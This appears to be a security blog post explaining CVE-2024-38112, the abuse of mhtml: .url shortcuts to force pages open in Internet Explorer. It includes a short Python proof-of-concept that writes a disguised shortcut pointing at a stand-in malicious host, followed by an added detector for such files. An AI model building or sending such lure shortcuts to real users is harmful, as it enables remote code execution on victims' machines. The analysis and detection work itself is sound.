Monday, July 8, 2024

Unveiling CVE-2024-38112 in the Shadows of Internet Explorer

Overview

Recent security research uncovered a new vulnerability in Windows that abuses the still-present Internet Explorer engine to execute remote code. The attack relies on .url files, which attackers can use to trick victims into opening malicious websites in the outdated Internet Explorer instead of in more secure modern browsers such as Chrome or Edge.

Background

.url files in Windows are shortcuts to webpages. In this case, attackers craft these files with the mhtml protocol handler and a deceptive file type presentation (e.g., an icon and name that suggest a PDF) to entice the user to open them.

Explanation

This vulnerability exploits the way Internet Explorer handles the mhtml protocol, combined with a disguised file type:

  1. Attackers create a .url file whose URL uses the mhtml protocol and points to a website they control.
  2. The file icon and name are chosen to look like a harmless PDF, increasing the likelihood that a user will open it.
  3. When the user opens the file, Internet Explorer (rather than the default browser) is invoked and loads an HTML page containing malicious scripts.
  4. That page then prompts the download and execution of a .hta file, whose embedded scripts complete the attack.

Exploit Code:

import os

def create_malicious_url_file():
    # INI-style Internet Shortcut: the mhtml: handler causes the link to be
    # opened by Internet Explorer instead of the default browser, and the icon
    # is borrowed from msedge.exe so the file looks legitimate.
    content = """
[InternetShortcut]
URL=mhtml:http://example.com/malicious_page.html!x-usc:http://example.com/malicious_page.html
IconFile=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
IconIndex=1
    """
    filename = "CVE-2024-38112_Demo.url"
    with open(filename, "w") as file:
        file.write(content)
    print(f"Malicious .url file created: {filename}")

def simulate_user_action():
    # Mimics a user double-clicking the shortcut (Windows only); not called by main().
    try:
        os.startfile("CVE-2024-38112_Demo.url")
        print("Attempted to open the malicious .url file.")
    except Exception as e:
        print(f"Error: {str(e)}")

def main():
    create_malicious_url_file()

if __name__ == "__main__":
    main()
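A defender-side check for the .url pattern described in the Explanation section and produced by the code above, added here as an example that is not part of the original post. It parses the INI-style Internet Shortcut format and flags the mhtml: handler, the x-usc: segment, and an icon borrowed from an executable; the samples are constructed, and the icon heuristic is an assumption.

```python
import re
from configparser import ConfigParser, Error as ConfigError

# Constructed samples (assumption: real files would be read from disk, e.g. from
# a mail attachment quarantine). The first mirrors the mhtml pattern above.
SUSPICIOUS_SAMPLE = """[InternetShortcut]
URL=mhtml:http://example.com/malicious_page.html!x-usc:http://example.com/malicious_page.html
IconFile=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
IconIndex=1
"""
BENIGN_SAMPLE = """[InternetShortcut]
URL=https://example.com/docs/
"""

def parse_internet_shortcut(text: str) -> dict:
    """Parse the INI-style .url format and return the [InternetShortcut] keys."""
    parser = ConfigParser(interpolation=None)
    parser.optionxform = str          # keep key case as written in the file
    try:
        parser.read_string(text)
    except ConfigError:
        return {}
    if not parser.has_section("InternetShortcut"):
        return {}
    return dict(parser.items("InternetShortcut"))

def analyze_url_file(text: str) -> list[str]:
    """Return human-readable findings; an empty list means nothing matched."""
    fields = parse_internet_shortcut(text)
    url = fields.get("URL", "")
    icon = fields.get("IconFile", "")
    findings = []
    if re.match(r"^\s*mhtml:", url, re.IGNORECASE):
        findings.append("URL uses the mhtml: handler, which hands the link to Internet Explorer")
    if "!x-usc:" in url.lower():
        findings.append("URL embeds an x-usc: segment pointing at a remote page")
    # Heuristic (assumption): a shortcut borrowing its icon from another
    # application's executable is how the file is dressed up as a document.
    if re.search(r"\.exe$", icon, re.IGNORECASE):
        findings.append(f"IconFile borrows an icon from an executable: {icon}")
    return findings

def is_suspicious_url_file(text: str) -> bool:
    return bool(analyze_url_file(text))

if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, "->", analyze_url_file(sample) or "no findings")
```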
